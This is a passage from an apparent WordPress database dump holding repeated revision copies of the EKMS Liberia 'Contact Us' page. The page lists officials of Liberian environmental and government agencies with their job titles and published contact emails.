Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/sherman-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/borbor-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />Finance &amp; Administrative Officer<br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Henry A. Simpson </strong><br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p><p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel Ballah </strong><br />MGCSP<br /><a href=\"mailto:ballah_@yahoo.com\">ballah_@yahoo.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-29 10:14:18','2021-03-29 10:14:18','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3653,42,'2021-03-29 10:14:18','2021-03-29 10:14:18','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/sherman-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/borbor-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />Finance &amp; Administrative Officer<br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Henry A. Simpson </strong><br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p><p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel Ballah </strong><br />MGCSP<br /><a href=\"mailto:ballah_@yahoo.com\">ballah_@yahoo.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-29 10:14:18','2021-03-29 10:14:18','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3654,42,'2021-03-29 10:14:18','2021-03-29 10:14:18','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" 